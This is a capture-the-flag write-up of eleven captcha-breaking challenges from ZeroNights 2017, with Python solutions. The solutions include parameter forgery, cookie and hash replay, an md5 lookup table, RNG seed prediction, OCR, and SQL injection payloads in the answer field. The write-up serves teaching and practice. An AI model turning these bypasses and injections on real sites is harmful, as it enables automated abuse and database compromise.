Challenges from ZeroNights 2017: Become the Captcha King
This year, at the ZeroNights information security conference, SberTech's application security testing department invited participants to look for vulnerabilities in various captcha implementations. In total, we prepared 11 examples with logic or implementation errors that make it possible to solve many captchas in a short time. In each round, participants had to “solve” 20 captchas in 10 seconds while reaching the required percentage of correct answers.
We invite you to take part too. This post links to all the tasks, compiled by fryday, and under each of them, in a spoiler, gives the write-up by participant Liro with the correct answers.
To access the tasks, you need to register on the task site. It does not take long: there are no confirmation emails, and you can log in immediately after entering your data.
Warm-up task: Ciferka
This task is meant to familiarize you with the interface. Each task begins with a brief description, the total number of captchas, the required percentage of correctly entered captchas, the time limit, and the points awarded. The number of points gives a rough idea of the task's difficulty.
Task 2: “A little bit greeky”
Solution
In this task, each captcha asks us to enter a “meaningful” word. A quick Google search shows that these are the names of gods from Greek mythology. After entering a few captchas and looking at the image markup in the page source, we notice that the image number changes each time.
We can assume that the number of images is limited. The page source contains links to the captcha images themselves. We downloaded them by hand; there were 16 in total.
So we have a finite set of images numbered 1 to 16, where each number corresponds to the name of a specific character. All that remains is, for each request, to find the captcha number in the page source and send the name that corresponds to it:
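import re
import requests

# Assumed setup (not shown in the original write-up): one session shared by all
# chalN functions, already logged in to the site, plus an optional proxy such as Burp Suite.
s = requests.Session()
proxies = {}

def chal2():
    def load_captcha_images():
        # One-off helper for downloading the images to label them by hand.
        # range(1, 16) fetches images 1..15, one per name in the list below.
        url = "http://captcha.cf/static/ciferki/{}.png"
        for i in range(1, 16):
            resp = requests.get(url.format(i))
            with open('captcha1/{}.png'.format(i), 'wb') as f:
                f.write(resp.content)

    gods = 'Zeus Hera Aphrodite Apollo Ares Leto Athena Phobos Dionysus Hades Triton Hermes Eos Poseidon Morpheus'
    captcha_solutions = gods.split()
    resp = s.post('http://captcha.cf/challenge/2/start', proxies=proxies)
    resp = s.get('http://captcha.cf/challenge/2', proxies=proxies)
    for i in range(50):
        # The original pattern was lost in extraction; this one is reconstructed
        # from the image URL above and is an assumption.
        captcha_match = re.search(r'static/ciferki/(\d+)\.png', resp.text)
        if not captcha_match:
            print(resp.text)
            break
        captcha_num = int(captcha_match.group(1))
        print('captcha_num:', captcha_num)
        resp = s.post(
            'http://captcha.cf/captcha',
            data={'answer': captcha_solutions[captcha_num - 1]},
            proxies=proxies)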
Task 3: "One, two, three ..."
Solution
If you read the task carefully, you will notice one oddity: only 24% of the answers have to be correct to pass. Let's keep this in mind and continue.
Every captcha in this task asks us to enter the sum of some numbers. After going through all the captchas, it becomes clear that only the numbers 1 to 4 are used as addends.
Let's enumerate all the combinations that can appear, assuming that no addend is greater than 4:
1 + 1 = 2 | 2 + 1 = 3 | 3 + 1 = 4 | 4 + 1 = 5 |
1 + 2 = 3 | 2 + 2 = 4 | 3 + 2 = 5 | 4 + 2 = 6 |
1 + 3 = 4 | 2 + 3 = 5 | 3 + 3 = 6 | 4 + 3 = 7 |
1 + 4 = 5 | 2 + 4 = 6 | 3 + 4 = 7 | 4 + 4 = 8 |
The most frequent sum is 5: it accounts for 4 of the 16 combinations, exactly 25%. The task requires only 24% correct captchas, so if we answer “5” every time, we can expect to pass:
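import time

def chal3():
    resp = s.post('http://captcha.cf/challenge/3/start', proxies=proxies)
    for i in range(20):
        # 5 is the most likely sum, so always answer 5.
        resp = s.post('http://captcha.cf/captcha', data={'answer': 5}, proxies=proxies)
    # The source indentation was lost; the pause is assumed to follow the loop.
    time.sleep(65)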
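The 25% figure can be double-checked by brute force. The sketch below enumerates every ordered pair of addends from 1 to 4 and counts the sums. It also estimates how often a single run of 20 captchas would pass, assuming the addends are drawn uniformly and that 24% of 20 means at least 5 correct answers; neither assumption is stated in the task.

```python
from collections import Counter
from itertools import product
from math import ceil, comb

# All ordered pairs of addends, assuming only 1..4 are used.
sums = Counter(a + b for a, b in product(range(1, 5), repeat=2))
best_sum, count = sums.most_common(1)[0]
share = count / sum(sums.values())  # fraction of pairs giving the most common sum

def pass_probability(n=20, p=share, required=0.24):
    """Chance of at least ceil(required * n) hits in n independent tries."""
    need = ceil(required * n)
    return sum(comb(n, k) * p**k * (1 - p)**(n - k) for k in range(need, n + 1))

print(best_sum, share, round(pass_probability(), 3))
```

Under these assumptions a single run passes somewhat more often than not, so a failed attempt can simply be repeated.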
Task 4: "We need to go deeper"
Solution
We look at the page source and see obfuscated JavaScript. Most likely, this code also checks whether the entered captcha is correct. Let's test this theory with Burp Suite.
Besides the entered captcha, a “correct” parameter is also sent to the server, and it is set to 1. This means we can trick the server by sending the same captcha value every time, as long as we add the correct parameter:
def chal4():
    resp = s.post('http://captcha.cf/challenge/4/start', proxies=proxies)
    for i in range(20):
        print(i)
        # The answer itself does not matter; the server trusts 'correct'.
        s.post('http://captcha.cf/captcha',
               data={'answer': '0C8X4', 'correct': '1'},
               allow_redirects=False, proxies=proxies)
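Why this works can be shown with a toy model. Both functions below are hypothetical, since the real server code is not part of the write-up: the first trusts a client-supplied `correct` flag, as the challenge server appears to, and the second compares the answer with a value kept on the server.

```python
def check_trusting_client(form: dict) -> bool:
    """Vulnerable: believes whatever the browser reports in 'correct'."""
    return form.get('correct') == '1'

def check_on_server(form: dict, expected: str) -> bool:
    """Safer: ignores client flags and compares with the server-side answer."""
    return form.get('answer') == expected

forged = {'answer': '0C8X4', 'correct': '1'}  # same request body as in chal4
# '7KQ2M' is a made-up "real" answer used only for this illustration.
print(check_trusting_client(forged))
print(check_on_server(forged, expected='7KQ2M'))
```

The forged request passes the first check whatever the answer is, and fails the second unless the answer really matches.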
Task 5: Promzona
Solution
Visual analysis of the captcha yields nothing, so we turn to Burp Suite.
As it turns out, besides the captcha answer, a “kod” parameter is also sent to the server; its value is stored in the page source.
It is easy to guess that “kod” is the md5 hash of the answer. So we send the server the same valid answer/kod pair 20 times, and the task is counted as solved:
def chal5():
    resp = s.post('http://captcha.cf/challenge/5/start', proxies=proxies)
    for i in range(20):
        print(i)
        # Replay one known-good answer together with its md5 hash.
        s.post('http://captcha.cf/captcha',
               data={'answer': '55', 'kod': 'b53b3a3d6ab90ce0268229151c9bde11'},
               allow_redirects=False, proxies=proxies)
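Rather than hard-coding the pair, the `kod` value can be derived for any answer. This is a minimal sketch, assuming `kod` is the hex md5 digest of the answer string; `make_pair` is a hypothetical helper name.

```python
import hashlib

def make_pair(answer: str) -> dict:
    """Build the form data: the answer plus its md5 hex digest as 'kod'."""
    kod = hashlib.md5(answer.encode('utf-8')).hexdigest()
    return {'answer': answer, 'kod': kod}

data = make_pair('55')
print(data)
```

The printed digest can be compared with the value hard-coded in chal5.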
Task 6: Dispersion
Solution
While entering captchas, we noticed that a captcha is always five characters long and uses only capital letters and digits. Looking at the page source, we also see that the file name of the captcha image is the md5 hash of its characters.
Analysis with Burp Suite shows that only the answer field, containing the captcha answer, is needed.
All that remains is to extract the hash from the page source and use it to recover the captcha value. Inverting a hash function directly is computationally infeasible, so we take another route: we build a table of all possible captchas (uppercase letters and digits only, always 5 characters long) paired with their md5 hashes, and look up the captcha value by its hash:
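import re
import sh  # third-party wrapper for calling shell commands such as grep

def chal6():
    resp = s.post('http://captcha.cf/challenge/6/start')
    for i in range(20):
        # The image file name is the md5 hash of the captcha text.
        m = re.search(r'static/regenbogen/(.*?)\.png', resp.text)
        hash_ = m.group(1)
        # Table lines look like "<md5>:<captcha>"; files are split by first hash character.
        line = str(sh.grep(hash_, 'md5_tables/' + hash_[0] + '.md5'))
        word = line.split(':')[1].strip()
        print(hash_, word)
        resp = s.post('http://captcha.cf/captcha', data={'answer': word})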
To complete the task, we had to write a few helper functions:
- we generated md5 hashes for all possible answers of 5 characters consisting of capital letters and digits;
- to fit within the time limit, we split the hashes into files by their first character. That is, we look at the first character of the captcha hash, open the corresponding file, and search only there.
import hashlib
import itertools
import string

# An md5 hex digest can only start with one of these characters.
alphabet = string.digits + 'abcdef'

def gen_md5_table():
    a = string.ascii_uppercase + string.digits
    # 36**5 = 60,466,176 candidate captchas, one "<md5>:<captcha>" line each.
    with open('md5_table', 'w') as f:
        for chars in itertools.product(a, repeat=5):
            word = ''.join(chars)
            digest = hashlib.md5(word.encode('ascii')).hexdigest()
            f.write(digest + ':' + word + '\n')

# Workflow:
#   1. call gen_md5_table()
#   2. in bash: sort md5_table > md5_sorted
#   3. in bash: mkdir md5_tables
#   4. call split_to_files()

def split_to_files():
    file_handlers = {}
    for a in alphabet:
        file_handlers[a] = open('md5_tables/' + a + '.md5', 'w')
    with open('md5_sorted') as f:
        for line in f:
            file_handlers[line[0]].write(line)
    # Close the handles so buffered lines are flushed to disk.
    for fh in file_handlers.values():
        fh.close()
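The same lookup idea can be tried at a smaller scale without touching the disk. The sketch below builds an in-memory md5-to-text dictionary for a shortened captcha length (2 instead of 5, an assumption made only to keep the example fast) and inverts a hash with it. At the full length the table has 36^5 = 60,466,176 entries, which is why the write-up keeps it in files.

```python
import hashlib
import itertools
import string

ALPHABET = string.ascii_uppercase + string.digits  # 36 symbols

def build_table(length: int) -> dict:
    """Map md5 hex digest -> plaintext for every string of the given length."""
    table = {}
    for chars in itertools.product(ALPHABET, repeat=length):
        word = ''.join(chars)
        table[hashlib.md5(word.encode('ascii')).hexdigest()] = word
    return table

table = build_table(2)                    # 36**2 = 1296 entries
target = hashlib.md5(b'Z9').hexdigest()   # stands in for the image file name
print(len(table), table[target])
```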
Task 7: “Four rooms”
Solution
To our surprise, instead of obscure, hard-to-read characters, the task shows a clean, perfectly legible image.
Because the image is so legible, we can use optical character recognition. For Python 3 there is the pytesseract OCR module. We had to post-process its output slightly, removing spaces from the recognized text, since the captcha answer does not contain any.
import pytesseract
from PIL import Image

def chal7():
    s.post('http://captcha.cf/challenge/7/start', proxies=proxies)
    for i in range(1, 21):
        resp = s.get('http://captcha.cf/captcha/image', proxies=proxies)
        image_name = '/tmp/{}.png'.format(i)
        with open(image_name, 'wb') as f:
            f.write(resp.content)
        # Page segmentation mode 7 treats the image as a single line of text
        # (Tesseract 3.x spells the flag '-psm 7').
        text = pytesseract.image_to_string(Image.open(image_name), config='--psm 7')
        text = text.replace(' ', '').strip()  # the captcha contains no whitespace
        print('text:', text)
        s.post('http://captcha.cf/captcha', data={'answer': text},
               allow_redirects=False, proxies=proxies)
Task 8: “Strategic Explorations of Exoplanets and Disks with Subaru”
Solution
At first glance this looks like an ordinary nasty captcha. Let's look at the image markup in the page source.
The numbers in the image names increase, but no obvious sequence shows up while entering captchas. After some thought, it becomes clear: the values correspond to time. It is a parameter that grows steadily, but the dependence is not obvious, since it is impossible to perform actions manually at perfectly equal intervals.
The number on the captcha is some transformation of the time value written in the page source. One common use of time is to seed a random number generator. We noticed that the captcha numbers ranged from 10,000 to 100,000, so we used these bounds when generating the random numbers:
import random
import re

def chal8():
    resp = s.post('http://captcha.cf/challenge/8/start', proxies=proxies)
    for i in range(20):
        # The number in the image name is used as the seed.
        m = re.search(r'/static/random/42_(\d+)\.png', resp.text)
        r = m.group(1)
        random.seed(int(r))
        print('r:', r)
        ans = random.randrange(10000, 100000)
        resp = s.post('http://captcha.cf/captcha', data={'answer': ans}, proxies=proxies)
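The attack relies on a seeded generator being fully deterministic. Here is a small sketch of that property, assuming the server uses Python's `random` module seeded with the integer from the image name, which is what the solution above implies. `predict` is a hypothetical helper; it uses a private `random.Random` instance so the global generator state is left alone.

```python
import random

def predict(seed: int) -> int:
    """Return the first value a generator seeded with `seed` would produce."""
    rng = random.Random(seed)
    return rng.randrange(10000, 100000)

seed = 1510876543  # example value only, shaped like a Unix timestamp
print(predict(seed), predict(seed))  # the same number twice
```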
Task 9: Watson
Solution
Let's start right away with Burp Suite.
This task is harder. The request contains nothing besides the “answer” field, so we have to look for a way in somewhere else. After some research, we turned to the session cookie that is sent with the request. Its value looks very much like base64-encoded data, so we decoded it to check.
The captcha field in the decoded cookie suggests that the captcha is validated against the cookie. That is, for a given session cookie and the matching “answer” value, our answer will always be accepted:
import requests

def chal9():
    resp = s.post('http://captcha.cf/challenge/9/start', proxies=proxies)
    # Replay one captured cookie together with the answer that matches it.
    cookies = {'session': 'eyJjYXB0Y2hhIjoiZjhkYTJlYjY4ZmU2YmRjZmY4YTk1NzJiNjMxNGQ2YmMiLCJ1c2VybmFtZSI6ImRtaXRyeS5tYW50aXNAZ21haWwuY29tIn0.DO94IQ.gHUIa3tyIgQ-JdpQ-O0GwUerTSI'}
    for i in range(20):
        # Plain requests.post (not the session s), so only this cookie is sent.
        requests.post('http://captcha.cf/captcha', data={'answer': 'ICF4G'},
                      allow_redirects=False, proxies=proxies, cookies=cookies)
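The base64 check takes only a few lines. The sketch below assumes the cookie has the three-part layout `payload.timestamp.signature` (it resembles the one used by Flask sessions), with an uncompressed, URL-safe base64 JSON payload whose padding has been stripped. `decode_payload` is a hypothetical helper and the sample cookie is made up for the example.

```python
import base64
import json

def decode_payload(cookie: str) -> dict:
    """Decode the first dot-separated segment of the cookie as base64 JSON."""
    payload = cookie.split('.')[0]
    payload += '=' * (-len(payload) % 4)   # restore stripped padding
    return json.loads(base64.urlsafe_b64decode(payload))

# Build a made-up cookie of the same shape to try the decoder on.
body = base64.urlsafe_b64encode(
    json.dumps({'captcha': 'abc123'}).encode()).decode().rstrip('=')
sample = body + '.TIMESTAMP.SIGNATURE'
print(decode_payload(sample))
```

If the cookie is indeed signed rather than encrypted, its contents can be read but not altered without the server's key, which is why the solution replays it unchanged.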
Task 10: Medicine
Solution
To complete this task, you need to exploit a SQL injection in the answer parameter. The query compares the captcha result stored in the captcha table of the database with the captcha received from the user. Based on this, we pass the following value in the answer parameter:
11111' union select result from sqli.captcha where id='' -- 1
We automate the exploitation:
import re

def chal10():
    resp = s.post('http://captcha.cf/challenge/10/start')
    for i in range(20):
        # The captcha id is a hidden form field in the page.
        m = re.search(r'name="id" value="(.*?)">', resp.text)
        id_ = m.group(1)
        print(id_)
        data = {
            # "-- 1" comments out the rest of the original query.
            'answer': "asdadsdsa' union select result from sqli.captcha where id='{}' -- 1".format(id_),
            'id': id_
        }
        resp = s.post('http://captcha.cf/captcha', data=data)
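To see why the UNION payload passes the check, the query can be replayed against an in-memory SQLite database. Everything here is an assumption made for illustration: the table layout, the shape of the server's query, and the `is_accepted` helper. The real backend and its `sqli.captcha` table are not shown in the write-up.

```python
import sqlite3

db = sqlite3.connect(':memory:')
db.execute("CREATE TABLE captcha (id TEXT, result TEXT)")
db.execute("INSERT INTO captcha VALUES ('42', 'X7K2P')")

def is_accepted(answer: str, id_: str) -> bool:
    """Vulnerable check: user input is concatenated straight into the SQL text."""
    query = ("SELECT result FROM captcha "
             "WHERE id = '" + id_ + "' AND result = '" + answer + "'")
    return db.execute(query).fetchone() is not None

payload = "11111' union select result from captcha where id='42' -- 1"
print(is_accepted('wrong', '42'))   # False: no matching row
print(is_accepted(payload, '42'))   # True: the UNION branch supplies a row
```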
Task 11: "Poliklinika"
Solution
Task authors sometimes draw analogies between the names of tasks and the way to solve them. The medical theme worked in the previous task, and the name Poliklinika likewise hints at trying SQL injection here. To begin, we run the task through Burp.
Again we need two fields, “answer” and “id”. The second can be taken from the page source.
The SQL query logic appears to be something like
SELECT id FROM captcha_table WHERE captcha='$captcha'
followed by a comparison of the result with the id parameter of the request.
Let's change the query logic by passing anything' or id='id_parsed_from_page_body in the captcha parameter. Thanks to the logical OR, the query will succeed, and the id returned from the database will match the id sent in the request.
We verified this by exploiting the SQL injection in the captcha input.
The exploit worked; all that remains is to automate submitting the answers.
import re

def chal11():
    resp = s.post('http://captcha.cf/challenge/11/start', proxies=proxies)
    for i in range(20):
        # The captcha id is a hidden form field in the page.
        m = re.search(r'name="id" value="(.*?)">', resp.text)
        cid = m.group(1)
        # The OR clause makes the query return the row with our id.
        data = {'answer': "asdadsdsa' or id='{}' -- 1".format(cid), 'id': cid}
        resp = s.post('http://captcha.cf/captcha', data=data, proxies=proxies)
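The OR payload can be reproduced locally against an in-memory SQLite database, together with the usual fix. The table contents and both helper functions are hypothetical; only the query shape `SELECT id FROM captcha_table WHERE captcha='$captcha'` comes from the write-up.

```python
import sqlite3

db = sqlite3.connect(':memory:')
db.execute("CREATE TABLE captcha_table (id TEXT, captcha TEXT)")
db.executemany("INSERT INTO captcha_table VALUES (?, ?)",
               [('1', 'AAAAA'), ('2', 'BBBBB')])

def check_vulnerable(captcha: str, id_: str) -> bool:
    """Concatenates input into the query, then compares the returned id."""
    rows = db.execute(
        "SELECT id FROM captcha_table WHERE captcha='" + captcha + "'").fetchall()
    return any(row[0] == id_ for row in rows)

def check_parameterized(captcha: str, id_: str) -> bool:
    """Same logic with a bound parameter: the payload is treated as plain data."""
    rows = db.execute(
        "SELECT id FROM captcha_table WHERE captcha=?", (captcha,)).fetchall()
    return any(row[0] == id_ for row in rows)

payload = "anything' or id='2' -- 1"
print(check_vulnerable(payload, '2'))     # True
print(check_parameterized(payload, '2'))  # False
```

With a bound parameter the quote in the payload never reaches the SQL parser, so the injected OR clause has no effect.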